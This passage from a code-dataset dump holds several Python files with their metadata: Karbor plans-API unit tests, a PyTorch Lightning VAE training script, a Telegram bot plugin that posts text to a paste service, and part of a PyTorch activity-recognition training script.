See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport mock\nfrom oslo_config import cfg\nfrom webob import exc\n\nfrom karbor.api.v1 import plans\nfrom karbor.common import constants\nfrom karbor import context\nfrom karbor import exception\nfrom karbor.tests import base\nfrom karbor.tests.unit.api import fakes\n\nCONF = cfg.CONF\n\nDEFAULT_NAME = 'My 3 tier application'\nDEFAULT_DESCRIPTION = 'My 3 tier application protection plan'\nDEFAULT_PROVIDER_ID = 'efc6a88b-9096-4bb6-8634-cda182a6e12a'\nDEFAULT_PROJECT_ID = '39bb894794b741e982bd26144d2949f6'\nDEFAULT_RESOURCES = [{'id': 'efc6a88b-9096-4bb6-8634-cda182a6e144',\n \"type\": \"OS::Cinder::Volume\", \"name\": \"name1\"}]\nDEFAULT_PARAMETERS = {\"OS::Cinder::Volume\": {\"backup_name\": \"name\"}}\n\n\nclass PlanApiTest(base.TestCase):\n def setUp(self):\n super(PlanApiTest, self).setUp()\n self.controller = plans.PlansController()\n self.ctxt = context.RequestContext('demo', 'fakeproject', True)\n\n @mock.patch(\n 'karbor.services.protection.rpcapi.ProtectionAPI.show_provider')\n @mock.patch(\n 'karbor.objects.plan.Plan.create')\n def test_plan_create(self, mock_plan_create, mock_provider):\n plan = self._plan_in_request_body()\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n mock_provider.return_value = fakes.PROVIDER_OS\n self.controller.create(req, body)\n self.assertTrue(mock_plan_create.called)\n\n def test_plan_create_InvalidBody(self):\n plan = self._plan_in_request_body()\n body = {\"planxx\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(exc.HTTPUnprocessableEntity, self.controller.create,\n req, body)\n\n def test_plan_create_InvalidProviderId(self):\n plan = self._plan_in_request_body(\n name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n provider_id=\"\",\n status=constants.PLAN_STATUS_SUSPENDED,\n project_id=DEFAULT_PROJECT_ID,\n resources=[])\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(exception.InvalidInput, self.controller.create,\n req, body)\n\n def test_plan_create_InvalidResources(self):\n plan = self._plan_in_request_body(\n name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n provider_id=DEFAULT_PROVIDER_ID,\n status=constants.PLAN_STATUS_SUSPENDED,\n project_id=DEFAULT_PROJECT_ID,\n resources=[])\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(exception.InvalidInput, self.controller.create,\n req, body)\n\n @mock.patch(\n 'karbor.services.protection.rpcapi.ProtectionAPI.show_provider')\n def test_plan_create_InvalidParameters(self, mock_provider):\n parameters = {\"OS::Cinder::Volume\": {\"test\": \"os\"}}\n plan = self._plan_in_request_body(\n name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n provider_id=DEFAULT_PROVIDER_ID,\n status=constants.PLAN_STATUS_SUSPENDED,\n project_id=DEFAULT_PROJECT_ID,\n parameters=parameters)\n body = {\"plan\": plan}\n mock_provider.return_value = fakes.PROVIDER_OS\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.assertRaises(exc.HTTPBadRequest, self.controller.create,\n req, body)\n\n @mock.patch(\n 'karbor.api.v1.plans.PlansController._plan_get')\n @mock.patch(\n 'karbor.api.v1.plans.PlansController._plan_update')\n def test_plan_update(self, mock_plan_update, mock_plan_get):\n plan = self._plan_in_request_body()\n body = {\"plan\": plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n self.controller.update(\n req, \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\", body)\n 
self.assertTrue(mock_plan_update.called)\n        self.assertTrue(mock_plan_get.called)\n\n    def test_plan_update_InvalidBody(self):\n        plan = self._plan_in_request_body()\n        body = {\"planxx\": plan}\n        req = fakes.HTTPRequest.blank('/v1/plans')\n        self.assertRaises(\n            exc.HTTPBadRequest, self.controller.update,\n            req, \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\", body)\n\n    def test_plan_update_InvalidId(self):\n        plan = self._plan_in_request_body()\n        body = {\"plan\": plan}\n        req = fakes.HTTPRequest.blank('/v1/plans')\n        self.assertRaises(\n            exc.HTTPNotFound, self.controller.update,\n            req, \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\", body)\n\n    def test_plan_update_InvalidResources(self):\n        plan = self._plan_in_request_body(\n            name=DEFAULT_NAME,\n            description=DEFAULT_DESCRIPTION,\n            provider_id=DEFAULT_PROVIDER_ID,\n            status=constants.PLAN_STATUS_SUSPENDED,\n            project_id=DEFAULT_PROJECT_ID,\n            resources=[{'key1': 'value1'}])\n        body = {\"plan\": plan}\n        req = fakes.HTTPRequest.blank('/v1/plans')\n        self.assertRaises(\n            exception.InvalidInput, self.controller.update,\n            req, \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\", body)\n\n    @mock.patch(\n        'karbor.api.v1.plans.PlansController._get_all')\n    def test_plan_list_detail(self, mock_get_all):\n        req = fakes.HTTPRequest.blank('/v1/plans')\n        self.controller.index(req)\n        self.assertTrue(mock_get_all.called)\n\n    @mock.patch(\n        'karbor.api.v1.plans.PlansController._get_all')\n    def test_plan_index_limit_offset(self, mock_get_all):\n        req = fakes.HTTPRequest.blank('/v1/plans?limit=2&offset=1')\n        self.controller.index(req)\n        self.assertTrue(mock_get_all.called)\n\n        req = fakes.HTTPRequest.blank('/v1/plans?limit=-1&offset=1')\n        self.assertRaises(exc.HTTPBadRequest,\n                          self.controller.index,\n                          req)\n\n        req = fakes.HTTPRequest.blank('/v1/plans?limit=a&offset=1')\n        self.assertRaises(exc.HTTPBadRequest,\n                          self.controller.index,\n                          req)\n\n        url = '/v1/plans?limit=2&offset=43543564546567575'\n        req = fakes.HTTPRequest.blank(url)\n        self.assertRaises(exc.HTTPBadRequest,\n                          self.controller.index,\n                          req)\n\n    def test_plan_create_empty_dict(self):\n        plan = self._plan_in_request_body(parameters={})\n        body = {\"plan\": plan}\n        req = fakes.HTTPRequest.blank('/v1/plans')\n        self.controller.create(req, body)\n\n    @mock.patch(\n        'karbor.api.v1.plans.PlansController._plan_get')\n    def test_plan_show(self, mock_plan_get):\n        req = fakes.HTTPRequest.blank('/v1/plans')\n        self.controller.show(req, '2a9ce1f3-cc1a-4516-9435-0ebb13caa398')\n        self.assertTrue(mock_plan_get.called)\n\n    def test_plan_show_Invalid(self):\n        req = fakes.HTTPRequest.blank('/v1/plans/1')\n        self.assertRaises(\n            exc.HTTPBadRequest, self.controller.show,\n            req, \"1\")\n\n    @mock.patch(\n        'karbor.api.v1.plans.PlansController._plan_get')\n    def test_plan_delete(self, mock_plan_get):\n        req = fakes.HTTPRequest.blank('/v1/plans')\n        self.controller.delete(req, '2a9ce1f3-cc1a-4516-9435-0ebb13caa398')\n        self.assertTrue(mock_plan_get.called)\n\n    def test_plan_delete_Invalid(self):\n        req = fakes.HTTPRequest.blank('/v1/plans/1')\n        self.assertRaises(\n            exc.HTTPBadRequest, self.controller.delete,\n            req, \"1\")\n\n    @mock.patch(\n        'karbor.api.v1.plans.check_policy')\n    @mock.patch(\n        'karbor.api.v1.plans.PlansController._plan_get')\n    def test_plan_update_InvalidStatus(\n            self, mock_plan_get, mock_check_policy):\n        plan = self._plan_in_request_body(\n            name=DEFAULT_NAME,\n            description=DEFAULT_DESCRIPTION,\n            provider_id=DEFAULT_PROVIDER_ID,\n            status=constants.PLAN_STATUS_STARTED,\n            project_id=DEFAULT_PROJECT_ID,\n            resources=DEFAULT_RESOURCES)\n        body = {\"plan\": 
plan}\n req = fakes.HTTPRequest.blank('/v1/plans')\n mock_plan_get.return_value = plan\n self.assertRaises(exception.InvalidPlan,\n self.controller.update, req,\n \"2a9ce1f3-cc1a-4516-9435-0ebb13caa398\",\n body)\n\n def _plan_in_request_body(self, name=DEFAULT_NAME,\n description=DEFAULT_DESCRIPTION,\n provider_id=DEFAULT_PROVIDER_ID,\n status=constants.PLAN_STATUS_SUSPENDED,\n project_id=DEFAULT_PROJECT_ID,\n resources=DEFAULT_RESOURCES,\n parameters=DEFAULT_PARAMETERS):\n plan_req = {\n 'name': name,\n 'description': description,\n 'provider_id': provider_id,\n 'status': status,\n 'project_id': project_id,\n 'resources': resources,\n 'parameters': parameters,\n }\n\n return plan_req\n", "sub_path": "karbor/tests/unit/api/v1/test_plans.py", "file_name": "test_plans.py", "file_ext": "py", "file_size_in_byte": 9756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "oslo_config.cfg.CONF", "line_number": 25, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 25, "usage_type": "name"}, {"api_name": "karbor.tests.base.TestCase", "line_number": 36, "usage_type": "attribute"}, {"api_name": "karbor.tests.base", "line_number": 36, "usage_type": "name"}, {"api_name": "karbor.api.v1.plans.PlansController", "line_number": 39, "usage_type": "call"}, {"api_name": "karbor.api.v1.plans", "line_number": 39, "usage_type": "name"}, {"api_name": "karbor.context.RequestContext", "line_number": 40, "usage_type": "call"}, {"api_name": "karbor.context", "line_number": 40, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 49, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 49, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 49, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.PROVIDER_OS", "line_number": 50, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 50, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 42, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 44, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 57, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 57, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 57, "usage_type": "name"}, {"api_name": "webob.exc.HTTPUnprocessableEntity", "line_number": 58, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 58, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 66, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 66, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 70, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 70, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 70, "usage_type": "name"}, {"api_name": "karbor.exception.InvalidInput", "line_number": 71, "usage_type": "attribute"}, {"api_name": "karbor.exception", "line_number": 71, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 79, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 79, "usage_type": "name"}, {"api_name": 
"karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 83, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 83, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 83, "usage_type": "name"}, {"api_name": "karbor.exception.InvalidInput", "line_number": 84, "usage_type": "attribute"}, {"api_name": "karbor.exception", "line_number": 84, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 95, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 95, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.PROVIDER_OS", "line_number": 99, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 99, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 100, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 100, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 100, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 101, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 101, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 87, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 111, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 111, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 111, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 104, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 106, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 120, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 120, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 120, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 122, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 122, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 128, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 128, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 128, "usage_type": "name"}, {"api_name": "webob.exc.HTTPNotFound", "line_number": 130, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 130, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 138, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 138, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 142, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 142, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 142, "usage_type": "name"}, {"api_name": "karbor.exception.InvalidInput", "line_number": 144, "usage_type": "attribute"}, {"api_name": "karbor.exception", "line_number": 144, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 150, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 150, "usage_type": 
"attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 150, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 147, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 157, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 157, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 157, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 161, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 161, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 161, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 162, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 162, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 166, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 166, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 166, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 167, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 167, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 172, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 172, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 172, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 173, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 173, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 154, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 180, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 180, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 180, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 186, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 186, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 186, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 183, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 191, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 191, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 191, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 193, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 193, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 199, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 199, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 199, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 196, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 204, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", 
"line_number": 204, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 204, "usage_type": "name"}, {"api_name": "webob.exc.HTTPBadRequest", "line_number": 206, "usage_type": "attribute"}, {"api_name": "webob.exc", "line_number": 206, "usage_type": "name"}, {"api_name": "karbor.common.constants.PLAN_STATUS_STARTED", "line_number": 219, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 219, "usage_type": "name"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest.blank", "line_number": 223, "usage_type": "call"}, {"api_name": "karbor.tests.unit.api.fakes.HTTPRequest", "line_number": 223, "usage_type": "attribute"}, {"api_name": "karbor.tests.unit.api.fakes", "line_number": 223, "usage_type": "name"}, {"api_name": "karbor.exception.InvalidPlan", "line_number": 225, "usage_type": "attribute"}, {"api_name": "karbor.exception", "line_number": 225, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 209, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 211, "usage_type": "call"}, {"api_name": "karbor.common.constants.PLAN_STATUS_SUSPENDED", "line_number": 233, "usage_type": "attribute"}, {"api_name": "karbor.common.constants", "line_number": 233, "usage_type": "name"}]} +{"seq_id": "252403865", "text": "from argparse import ArgumentParser\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning import loggers as pl_loggers\n\nfrom models import VAE, IWAE, AMCVAE, LMCVAE, VAE_with_flows\nfrom utils import make_dataloaders, get_activations, str2bool\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser = pl.Trainer.add_argparse_args(parser)\n tb_logger = pl_loggers.TensorBoardLogger('lightning_logs/')\n\n parser.add_argument(\"--model\", default=\"VAE\",\n choices=[\"VAE\", \"IWAE\", \"AMCVAE\", \"LMCVAE\", \"VAE_with_flows\"])\n\n ## Dataset params\n parser.add_argument(\"--dataset\", default='mnist', choices=['mnist', 'fashionmnist', 'cifar', 'omniglot', 'celeba'])\n parser.add_argument(\"--binarize\", type=str2bool, default=False)\n ## Training parameters\n parser.add_argument(\"--batch_size\", default=32, type=int)\n parser.add_argument(\"--val_batch_size\", default=50, type=int)\n parser.add_argument(\"--grad_skip_val\", type=float, default=0.)\n parser.add_argument(\"--grad_clip_val\", type=float, default=0.)\n\n ## Architecture\n parser.add_argument(\"--hidden_dim\", default=64, type=int)\n parser.add_argument(\"--num_samples\", default=1, type=int)\n parser.add_argument(\"--act_func\", default=\"gelu\",\n choices=[\"relu\", \"leakyrelu\", \"tanh\", \"logsigmoid\", \"logsoftmax\", \"softplus\", \"gelu\"])\n parser.add_argument(\"--net_type\", choices=[\"fc\", \"conv\"], type=str, default=\"conv\")\n\n ## Specific parameters\n parser.add_argument(\"--K\", type=int, default=3)\n parser.add_argument(\"--n_leapfrogs\", type=int, default=3)\n parser.add_argument(\"--step_size\", type=float, default=0.01)\n\n parser.add_argument(\"--use_barker\", type=str2bool, default=False)\n parser.add_argument(\"--use_score_matching\", type=str2bool, default=False) # for ULA\n parser.add_argument(\"--use_cloned_decoder\", type=str2bool,\n default=False) # for AIS VAE (to make grad throught alphas easier)\n parser.add_argument(\"--learnable_transitions\", type=str2bool,\n default=False) # for AIS VAE and ULA (if learn stepsize or not)\n parser.add_argument(\"--variance_sensitive_step\", type=str2bool,\n default=False) # for AIS VAE and ULA (adapt stepsize based on dim's variance)\n 
parser.add_argument(\"--use_alpha_annealing\", type=str2bool,\n default=False) # for AIS VAE, True if we want anneal sum_log_alphas during training\n parser.add_argument(\"--annealing_scheme\", type=str,\n default='linear') # for AIS VAE and ULA VAE, strategy to do annealing\n parser.add_argument(\"--specific_likelihood\", type=str,\n default=None) # specific likelihood\n\n parser.add_argument(\"--ula_skip_threshold\", type=float,\n default=0.0) # Probability threshold, if below -- skip transition\n parser.add_argument(\"--acceptance_rate_target\", type=float,\n default=0.95) # Target acceptance rate\n parser.add_argument(\"--sigma\", type=float, default=1.)\n\n parser.add_argument(\"--num_flows\", type=int, default=1)\n\n act_func = get_activations()\n\n args = parser.parse_args()\n print(args)\n\n kwargs = {'num_workers': 20, 'pin_memory': True}\n train_loader, val_loader = make_dataloaders(dataset=args.dataset,\n batch_size=args.batch_size,\n val_batch_size=args.val_batch_size,\n binarize=args.binarize,\n **kwargs)\n image_shape = train_loader.dataset.shape_size\n if args.model == \"VAE\":\n model = VAE(shape=image_shape, act_func=act_func[args.act_func],\n num_samples=args.num_samples, hidden_dim=args.hidden_dim,\n net_type=args.net_type, dataset=args.dataset, specific_likelihood=args.specific_likelihood,\n sigma=args.sigma)\n elif args.model == \"IWAE\":\n model = IWAE(shape=image_shape, act_func=act_func[args.act_func], num_samples=args.num_samples,\n hidden_dim=args.hidden_dim,\n name=args.model, net_type=args.net_type, dataset=args.dataset,\n specific_likelihood=args.specific_likelihood, sigma=args.sigma)\n elif args.model == \"VAE_with_flows\":\n model = VAE_with_flows(shape=image_shape, act_func=act_func[args.act_func], num_samples=args.num_samples,\n hidden_dim=args.hidden_dim, name=args.model, flow_type=\"RealNVP\",\n num_flows=args.num_flows,\n net_type=args.net_type, dataset=args.dataset,\n specific_likelihood=args.specific_likelihood,\n sigma=args.sigma)\n elif args.model == 'AMCVAE':\n model = AMCVAE(shape=image_shape, step_size=args.step_size, K=args.K, use_barker=args.use_barker,\n num_samples=args.num_samples, acceptance_rate_target=args.acceptance_rate_target,\n dataset=args.dataset, net_type=args.net_type, act_func=act_func[args.act_func],\n hidden_dim=args.hidden_dim, name=args.model, grad_skip_val=args.grad_skip_val,\n grad_clip_val=args.grad_clip_val,\n use_cloned_decoder=args.use_cloned_decoder, learnable_transitions=args.learnable_transitions,\n variance_sensitive_step=args.variance_sensitive_step,\n use_alpha_annealing=args.use_alpha_annealing, annealing_scheme=args.annealing_scheme,\n specific_likelihood=args.specific_likelihood, sigma=args.sigma)\n elif args.model == 'LMCVAE':\n model = LMCVAE(shape=image_shape, step_size=args.step_size, K=args.K,\n num_samples=args.num_samples, acceptance_rate_target=args.acceptance_rate_target,\n dataset=args.dataset, net_type=args.net_type, act_func=act_func[args.act_func],\n hidden_dim=args.hidden_dim, name=args.model, grad_skip_val=args.grad_skip_val,\n grad_clip_val=args.grad_clip_val, use_score_matching=args.use_score_matching,\n use_cloned_decoder=args.use_cloned_decoder, learnable_transitions=args.learnable_transitions,\n variance_sensitive_step=args.variance_sensitive_step,\n ula_skip_threshold=args.ula_skip_threshold, annealing_scheme=args.annealing_scheme,\n specific_likelihood=args.specific_likelihood, sigma=args.sigma)\n else:\n raise ValueError\n\n args.gradient_clip_val = args.grad_clip_val\n 
automatic_optimization = (args.grad_skip_val == 0.) and (args.gradient_clip_val == 0.)\n\n    trainer = pl.Trainer.from_argparse_args(args, logger=tb_logger, fast_dev_run=False,\n                                            terminate_on_nan=automatic_optimization,\n                                            automatic_optimization=automatic_optimization)\n    trainer.fit(model, train_dataloader=train_loader, val_dataloaders=val_loader)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer.add_argparse_args", "line_number": 11, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.loggers.TensorBoardLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers", "line_number": 12, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 19, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 39, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 40, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 42, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 44, "usage_type": "name"}, {"api_name": "utils.str2bool", "line_number": 46, "usage_type": "name"}, {"api_name": "utils.get_activations", "line_number": 61, "usage_type": "call"}, {"api_name": "utils.make_dataloaders", "line_number": 67, "usage_type": "call"}, {"api_name": "models.VAE", "line_number": 74, "usage_type": "call"}, {"api_name": "models.IWAE", "line_number": 79, "usage_type": "call"}, {"api_name": "models.VAE_with_flows", "line_number": 84, "usage_type": "call"}, {"api_name": "models.AMCVAE", "line_number": 91, "usage_type": "call"}, {"api_name": "models.LMCVAE", "line_number": 101, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer.from_argparse_args", "line_number": 116, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 116, "usage_type": "attribute"}]}
+{"seq_id": "595026039", "text": "from pyrogram import Client, filters\nfrom pyrogram.types import Message\n\nfrom config import prefix\nfrom consts import http\n\n\n@Client.on_message(filters.command(\"paste\", prefix))\nasync def dogbin(c: Client, m: Message):\n    if m.reply_to_message:\n        if m.reply_to_message.document:\n            tfile = m.reply_to_message\n            to_file = await tfile.download()\n            with open(to_file, 'rb') as fd:\n                mean = fd.read().decode('UTF-8')\n        if m.reply_to_message.text:\n            mean = m.reply_to_message.text\n\n        url = \"https://del.dog/documents\"\n        r = await http.post(url, data=mean.encode('UTF-8'))\n        url = f\"https://del.dog/{r.json()['key']}\"\n        await m.reply_text(url, disable_web_page_preview=True)\n    else:\n        await m.reply_text(\"Please reply to a text message or a document.\")\n", "sub_path": "plugins/dogbin.py", "file_name": "dogbin.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pyrogram.Client", "line_number": 9, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 9, "usage_type": "name"}, {"api_name": "consts.http.post", "line_number": 20, 
"usage_type": "call"}, {"api_name": "consts.http", "line_number": 20, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 8, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 8, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 8, "usage_type": "call"}, {"api_name": "config.prefix", "line_number": 8, "usage_type": "argument"}, {"api_name": "pyrogram.filters", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "105229644", "text": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom src.utils.file_io import get_user_splits, get_activity_names, get_stats\nfrom src.dataloader.torch_dataloader import CustomDataLoader\nfrom src.models.ffnn import Net\nfrom src.train.trainloop import TrainLoop\n\n'''\nFit the model to preprocessed sensor data with window = 50, stride = 25, basic statistical features \n'''\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cpu\")\n# device = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\n\nbatch_size = 256\nn_layers = 3\nn_units = (512, 1024, 512)\nlr = 0.001\nmomentum = 0.9\nmax_epochs = 20\nwriter = SummaryWriter(\"experiments/tensorboard/experiment_4\")\n\nactivity_names = get_activity_names()\ntrain_users, val_users, test_users = get_user_splits()\n# Mean, Std = get_stats(train_users)\n# print(\"Means: \", list(Mean), \"Std Devs: \", list(Std))\n# print(len(train_users), len(val_users), len(test_users))\n\ntrain_dataset = CustomDataLoader(train_users)\nval_dataset = CustomDataLoader(val_users)\ntest_dataset = CustomDataLoader(test_users)\n\ntorch.save(train_dataset, './data/preprocessed/train_dataset_experiment4.pt')\ntorch.save(val_dataset, './data/preprocessed/val_dataset_experiment4.pt')\ntorch.save(test_dataset, './data/preprocessed/test_dataset_experiment4.pt')\n\n# train_dataset = torch.load('./data/preprocessed/train_dataset.pt', map_location=device)\n# val_dataset = torch.load('./data/preprocessed/val_dataset.pt', map_location=device)\n# test_dataset = torch.load('./data/preprocessed/test_dataset.pt', 